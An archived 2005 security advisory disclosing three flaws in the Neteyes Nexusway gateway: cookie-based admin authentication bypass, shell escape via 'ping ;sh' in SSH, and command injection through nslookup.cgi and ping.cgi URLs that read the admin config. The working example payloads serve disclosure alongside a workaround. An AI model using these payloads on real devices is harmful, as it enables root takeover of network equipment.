lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <opsqld31mzsmddlu@sampah>
Date: Wed, 11 May 2005 11:46:39 +0800
From: pokley <pokleyzz@...n-associates.net>
To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
	"full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: [Scan Associates Advisory] Neteyes Nexusway
	multiple vulnerability



Product : Neteyes Nexusway (http://www.neteyes.com.tw)
Description: Neteyes Nexusway multiple vulnerability
Severity: Very High

Description
===========
The NexusWay is a Multiservice Border Gateway that provides the
Multiaccess and Multiservice capabilities in the border segment of an
enterprise network.

Detail
======

Weak authentication in web module
---------------------------------
By sending crafted http cookies, any user with access to port 443 on
Neteyes Nexusway may use this vulnerability to become Neteyes Nexusway
admin. This will allow user to change any configuration on this device.

Example:
	# curl -k -b 'cyclone500_write=1; cyclone500_auth=1;  
client_ip1;client=0.0.0.0' https://192.168.1.135/index.cgi

Escaping to Operating System shell in SSH module
------------------------------------------------
User with access to SSH module may able to access Shell or execute any
command as "root" privileges on Neteyes Nexusway by sending crafted
argument in certain command. This will allow user to do anything on this
device.

Example:
	> ping ;sh
	> traceroute ;sh

Remote command execution in web module
--------------------------------------
Any user with access to port 443 on Neteyes Nexusway is able to fully
control Neteyes Nexusway device by sending special crafted packet to
certain administration script. Web server is run as "root" on this devices.

Example:
	https://192.168.1.135/nslookup.cgi?ip=localhost%26%26cat%20/stand/htdocs/config/admin
	https://192.168.1.135/ping.cgi?ip=localhost%26%26touch+/tmp/test

Workaround
==========
Disable Web Administration module
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ